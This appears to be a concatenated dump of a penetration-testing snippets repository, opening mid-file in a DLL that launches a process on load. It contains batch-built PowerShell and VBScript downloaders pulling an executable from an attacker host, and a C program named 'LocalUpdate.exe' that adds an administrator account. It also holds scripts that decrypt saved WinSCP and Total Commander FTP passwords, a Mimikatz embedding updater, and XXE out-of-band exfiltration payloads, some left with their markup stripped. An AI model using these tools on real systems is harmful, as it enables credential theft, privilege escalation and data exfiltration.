NULL, NULL, TRUE, 0, NULL, NULL, &info, &processInfo)) 35 | { 36 | WaitForSingleObject(processInfo.hProcess, INFINITE); 37 | CloseHandle(processInfo.hProcess); 38 | CloseHandle(processInfo.hThread); 39 | MessageBox(0, NULL, TEXT("Success"), MB_OK); 40 | } 41 | 
else { 42 | MessageBox(0, NULL, TEXT("Failure"), MB_OK); 43 | } 44 | } 45 | 46 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 47 | { 48 | switch (ul_reason_for_call) 49 | { 50 | case DLL_PROCESS_ATTACH: 51 | scriptExec(); 52 | break; 53 | case DLL_THREAD_ATTACH: 54 | break; 55 | case DLL_THREAD_DETACH: 56 | break; 57 | case DLL_PROCESS_DETACH: 58 | break; 59 | } 60 | return TRUE; 61 | } 62 | 63 | extern "C" __declspec(dllexport) int main() { 64 | } -------------------------------------------------------------------------------- /snippets/windows/utils/runas1.bat: -------------------------------------------------------------------------------- 1 | REM powershell -ExecutionPolicy Bypass -File runas.ps1 2 | 3 | echo $username = 'VAR_USERNAME' > runas.ps1 4 | echo $securePassword = ConvertTo-SecureString 'VAR_PASSWORD' -AsPlainText -Force >> runas.ps1 5 | echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1 6 | echo Start-Process cmd.exe -Credential $credential >> runas.ps1 -------------------------------------------------------------------------------- /snippets/windows/utils/runas2.bat: -------------------------------------------------------------------------------- 1 | REM powershell -ExecutionPolicy Bypass -File script.ps1 2 | 3 | echo $pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "VAR_DOMAIN\VAR_USERNAME",$pw > script.ps1 4 | echo $script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat" >> script.ps1 5 | echo Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}' >> script.ps1 -------------------------------------------------------------------------------- /snippets/windows/utils/schcheck.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | REM Source: 
https://raw.githubusercontent.com/ankh2054/windows-pentest/master/schcheck.bat 3 | REM - Lists all schededuled tasks. Runs list of executables against icacls and checks if any allow Everyone RW permissions. 4 | REM - Note: At present the script only ECHO's tasks. 5 | for /f "tokens=3* delims=: " %%m in ('schtasks /query /v /fo LIST ^| find "Task To Run:"') do ( 6 | for /f "tokens=1* delims=?" %%x in ('echo(%%~n^| findstr /L /V /I /C:"COM handler" /C:"multiple" /C:"%SystemRoot%" /C:"shutdown"') do ( 7 | ECHO %%~x REM > results.txt 8 | ) 9 | ) 10 | -------------------------------------------------------------------------------- /snippets/windows/utils/tcpwrecovery.py: -------------------------------------------------------------------------------- 1 | """ 2 | Copyright (C) <2013> 3 | 4 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: 5 | 6 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. 7 | 8 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
9 | """ 10 | 11 | import os 12 | import optparse 13 | 14 | def process_file(filename): 15 | try: 16 | print "-> Trying: " + filename 17 | f = open(filename,"r") 18 | print "-> Found: " + filename 19 | print "-> Decrypting: " + filename 20 | print "" 21 | for line in f: 22 | if ("password" in line.strip()): 23 | print "password=" + tc_decrypt(line.strip().split("=")[1]) 24 | else: print line.strip() 25 | f.close() 26 | print "" 27 | except IOError: 28 | print "-> Not found: " + filename 29 | print "" 30 | 31 | def search_ini(): 32 | """ 33 | Search the wcx_ftp.ini file in common places 34 | """ 35 | folder = [] 36 | folder.append(os.getenv('APPDATA') + "\\GHISLER\\wcx_ftp.ini") 37 | folder.append(os.getenv('SYSTEMROOT') + "\\wcx_ftp.ini") 38 | folder.append("wcx_ftp.ini") 39 | for ini in folder: 40 | process_file(ini) 41 | 42 | def tc_random(nMax): 43 | global RANDOM_BASE 44 | RANDOM_BASE = ((RANDOM_BASE * 0x8088405) & 0xffffffff) + 1 45 | return (((RANDOM_BASE * nMax) >> 32)& 0xffffffff) 46 | 47 | def tc_shift(n1, n2): 48 | return (((n1 << n2) & 0xffffffff) | ((n1 >> (8 - n2)) & 0xffffffff)) & 0xff 49 | 50 | def tc_decrypt(pwd): 51 | global RANDOM_BASE 52 | password=[] 53 | for i in range(len(pwd)/2 - 4): #skip last 8 characters (4 * 2 bytes) 54 | password.append(int(pwd[2*i:2*(i+1)],16)) 55 | pwlen = len(password) 56 | 57 | RANDOM_BASE = 849521 58 | 59 | for i in range(pwlen): 60 | password[i] = tc_shift(password[i], tc_random(8)) 61 | 62 | RANDOM_BASE = 12345 63 | for i in range(256): 64 | a=tc_random(pwlen) 65 | b=tc_random(pwlen) 66 | password[a],password[b] = password[b],password[a] 67 | 68 | RANDOM_BASE = 42340 69 | for i in range(pwlen): 70 | password[i] = (password[i] ^ tc_random(256)) & 0xff 71 | 72 | RANDOM_BASE = 54321 73 | for i in range(pwlen): 74 | password[i] = (password[i] - tc_random(256)) & 0xff 75 | 76 | for i in range(pwlen): 77 | password[i] = chr(password[i]) 78 | 79 | return "".join(password) 80 | 81 | def main(): 82 | usage = "Usage: %prog 
[options]" 83 | parser = optparse.OptionParser(usage=usage) 84 | 85 | parser.add_option('-c', '--common', action='store_true', dest='common', default=False, help='Search wcx_ftp.ini in common places') 86 | parser.add_option('-f', '--file', action='store', dest="file", default='', help='File to decrypt') 87 | parser.add_option('-p', '--password', action='store', dest='password', default='', help='Password to decrypt') 88 | options, args = parser.parse_args() 89 | if options.common: 90 | search_ini() 91 | if (options.file != ""): 92 | process_file(options.file) 93 | if (options.password != ""): 94 | pw = tc_decrypt(options.password) 95 | print "Decrypted password: " + pw 96 | if (options.file == "" and options.password == "" and not options.common): 97 | print "Nothing specified, run \"tcpwrecovery -h\" for options" 98 | 99 | if __name__ == '__main__': 100 | main() 101 | 102 | 103 | -------------------------------------------------------------------------------- /snippets/windows/utils/update_invoke_mimikatz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | # Source: https://raw.githubusercontent.com/gg-sec/update_invoke_mimikatz/30c459843e1cc7b4b218317f92c1f7af648ae002/update_invoke_mimikatz.py 4 | 5 | # Add the newest version of Mimikatz to Invoke-Mimikatz, a powershell version of mimikatz 6 | # Get the newest version von Benjamin Delphis Github first and extract it to this directory 7 | 8 | # wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.7z 9 | # Got to be replaced with the most recent version, this one here is from March 2020 10 | 11 | 12 | import fileinput 13 | import base64 14 | 15 | 16 | 17 | with open("./Win32/mimikatz.exe", "rb") as f: 18 | win32 = base64.b64encode(f.read()).decode() 19 | 20 | with open("./x64/mimikatz.exe", "rb") as f: 21 | x64 = base64.b64encode(f.read()).decode() 22 | 23 | 24 | for line in 
fileinput.FileInput("./Invoke-Mimikatz.ps1", inplace=1): 25 | 26 | line = line.rstrip('\r\n') 27 | if "$PEBytes64 = " in line: 28 | print("$PEBytes64 = '" + x64 + "'") 29 | elif "$PEBytes32 = " in line: 30 | print("$PEBytes32 = '" + win32 + "'") 31 | else: 32 | print(line) 33 | -------------------------------------------------------------------------------- /snippets/windows/utils/useradd.c: -------------------------------------------------------------------------------- 1 | // x86_64-w64-mingw32-gcc useradd.c -o LocalUpdate.exe 2 | 3 | #include 4 | 5 | int main () 6 | { 7 | int i; 8 | i = system("net user VAR_USERNAME VAR_PASSWORD /add && net localgroup administrators VAR_USERNAME /add"); 9 | return 0; 10 | } -------------------------------------------------------------------------------- /snippets/windows/utils/wget_ps1.bat: -------------------------------------------------------------------------------- 1 | REM powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 2 | 3 | echo $storageDir = $pwd > wget.ps1 4 | echo $webclient = New-Object System.Net.WebClient >> wget.ps1 5 | echo $url = "http://VAR_ATTACKER_HOST/file.exe" >> wget.ps1 6 | echo $file = "file.exe" >> wget.ps1 7 | echo $webclient.DownloadFile($url,$file) >> wget.ps1 -------------------------------------------------------------------------------- /snippets/windows/utils/wget_vbs.bat: -------------------------------------------------------------------------------- 1 | REM cscript wget.vbs http://VAR_ATTACKER_HOST/file.exe file.exe 2 | 3 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 4 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 5 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 6 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 7 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 8 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 9 | echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> 
wget.vbs 10 | echo Err.Clear >> wget.vbs 11 | echo Set http = Nothing >> wget.vbs 12 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 13 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 14 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 15 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 16 | echo http.Open "GET",strURL,False >> wget.vbs 17 | echo http.Send >> wget.vbs 18 | echo varByteArray = http.ResponseBody >> wget.vbs 19 | echo Set http = Nothing >> wget.vbs 20 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 21 | echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs 22 | echo strData = "" >> wget.vbs 23 | echo strBuffer = "" >> wget.vbs 24 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 25 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs 26 | echo Next >> wget.vbs 27 | echo ts.Close >> wget.vbs -------------------------------------------------------------------------------- /snippets/windows/utils/winscppassword.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | # Source: https://github.com/dzxs/winscppassword 4 | 5 | try: 6 | import _winreg 7 | except: 8 | import winreg as _winreg 9 | import random 10 | 11 | PWALG_SIMPLE = 1 12 | PWALG_SIMPLE_MAGIC = 0xA3 13 | PWALG_SIMPLE_STRING = '0123456789ABCDEF' 14 | PWALG_SIMPLE_MAXLEN = 50 15 | PWALG_SIMPLE_FLAG = 0xFF 16 | PWALG_SIMPLE_INTERNAL = 0x00 17 | 18 | 19 | def simple_encrypt_char(char): 20 | char = ~char ^ PWALG_SIMPLE_MAGIC 21 | a = (char & 0xF0) >> 4 22 | b = (char & 0x0F) >> 0 23 | return PWALG_SIMPLE_STRING[a] + PWALG_SIMPLE_STRING[b] 24 | 25 | 26 | def simple_decrypt_next_char(password_list): 27 | if len(password_list) <= 0: 28 | return 0x00 29 | a = PWALG_SIMPLE_STRING.find(password_list.pop(0)) 30 | b = 
PWALG_SIMPLE_STRING.find(password_list.pop(0)) 31 | return 0xff & ~(((a << 4) + b << 0) ^ PWALG_SIMPLE_MAGIC) 32 | 33 | 34 | def encrypt_password(password, key): 35 | """ 36 | encrypt_password('helloworld123', 'root'+'120.24.61.91') 37 | """ 38 | password = key + password 39 | if len(password) < PWALG_SIMPLE_MAXLEN: 40 | shift = random.randint(0, PWALG_SIMPLE_MAXLEN - len(password)) 41 | else: 42 | shift = 0 43 | result = '' 44 | result += simple_encrypt_char(PWALG_SIMPLE_FLAG) 45 | result += simple_encrypt_char(PWALG_SIMPLE_INTERNAL) 46 | result += simple_encrypt_char(len(password)) 47 | result += simple_encrypt_char(shift) 48 | for i in range(shift): 49 | result += simple_encrypt_char(random.randint(0, 256)) 50 | for i in password: 51 | result += simple_encrypt_char(ord(i)) 52 | while len(result) < PWALG_SIMPLE_MAXLEN * 2: 53 | result += simple_encrypt_char(random.randint(0, 256)) 54 | return result 55 | 56 | 57 | def decrypt_password(password, key): 58 | """ 59 | decrypt_password(encrypt_password, 'root'+'120.24.61.91') 60 | """ 61 | if not password or not key: 62 | return '' 63 | password = list(password) 64 | flag = simple_decrypt_next_char(password) 65 | if flag == PWALG_SIMPLE_FLAG: 66 | _ = simple_decrypt_next_char(password) 67 | length = simple_decrypt_next_char(password) 68 | else: 69 | length = flag 70 | password = password[int(simple_decrypt_next_char(password)) * 2:] 71 | result = '' 72 | for i in range(length): 73 | result += chr(simple_decrypt_next_char(password)) 74 | # print result 75 | if flag == PWALG_SIMPLE_FLAG: 76 | if result[:len(key)] != key: 77 | result = '' 78 | else: 79 | result = result[len(key):] 80 | return result 81 | 82 | 83 | def get_value(session_key, str): 84 | try: 85 | value = _winreg.QueryValueEx(session_key, str)[0] 86 | except Exception as e: 87 | value = '' 88 | return value 89 | 90 | 91 | def get_password(): 92 | decrypt_args = [] 93 | sessions_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'SOFTWARE\\Martin 
Prikryl\\WinSCP 2\\Sessions') 94 | count = _winreg.QueryInfoKey(sessions_key)[0] 95 | for index in range(count): 96 | session = _winreg.EnumKey(sessions_key, index) 97 | # print session 98 | session_key = _winreg.OpenKey(sessions_key, session) 99 | username = get_value(session_key, 'UserName') 100 | password = get_value(session_key, 'Password') 101 | hostname = get_value(session_key, 'HostName') 102 | decrypt_args.append({'password': password, 'username': username, 'hostname': hostname}) 103 | _winreg.CloseKey(session_key) 104 | 105 | _winreg.CloseKey(sessions_key) 106 | return decrypt_args 107 | 108 | 109 | if __name__ == '__main__': 110 | for session in get_password(): 111 | print(u"hostname: {0}\nusername: {1}\nencrypt_password: {2}\npassword: {3}\n".format( 112 | session['hostname'], 113 | session['username'], 114 | session['password'], 115 | decrypt_password(session['password'], session['username'] + session['hostname']), 116 | )) 117 | -------------------------------------------------------------------------------- /snippets/xml/xee.txt: -------------------------------------------------------------------------------- 1 | -- Source: https://gist.githubusercontent.com/staaldraad/01415b990939494879b4/raw/25cff41582552aee47b06526d568f5785af67deb/XXE_payloads 2 | 3 | `` Vanilla, used to verify outbound xxe or blind xxe 4 | 5 | 6 | 8 | 9 | ]> 10 | &sp; 11 | 12 | `` OoB extraction 13 | 14 | 15 | 17 | 18 | %sp; 19 | %param1; 20 | ]> 21 | &exfil; 22 | 23 | `` External dtd: 24 | 25 | 26 | "> 27 | 28 | `` OoB variation of above (seems to work better against .NET) 29 | 30 | 31 | 33 | 34 | %sp; 35 | %param1; 36 | %exfil; 37 | ]> 38 | 39 | `` External dtd: 40 | 41 | 42 | "> 43 | 44 | `` OoB extraction 45 | 46 | 47 | 49 | 50 | %sp; 51 | %param3; 52 | %exfil; 53 | ]> 54 | 55 | `` External dtd: 56 | 57 | "> 58 | 59 | `` OoB extra ERROR -- Java 60 | 61 | 62 | 64 | 65 | %sp; 66 | %param3; 67 | %exfil; 68 | ]> 69 | 70 | 71 | `` External dtd: 72 | 73 | '> %param1; %external; 74 | 
75 | `` OoB extra nice 76 | 77 | 78 | 80 | 81 | "> 82 | 83 | %dtd; 84 | ]> 85 | &all; 86 | 87 | `` External dtd: 88 | 89 | 90 | 91 | `` File-not-found exception based extraction 92 | 93 | 94 | 96 | %one; 97 | %two; 98 | %four; 99 | ]> 100 | 101 | `` External dtd: 102 | 103 | 104 | "> 105 | -- ^ you might need to encode this % (depends on your target) as: % 106 | 107 | `` FTP 108 | 109 | 110 | 112 | %asd; 113 | %c; 114 | ]> 115 | &rrr; 116 | 117 | `` External dtd 118 | 119 | 120 | "> 121 | 122 | `` Inside SOAP body 123 | 124 | %dtd;]>]]> 125 | 126 | `` Untested - WAF Bypass 127 | 128 |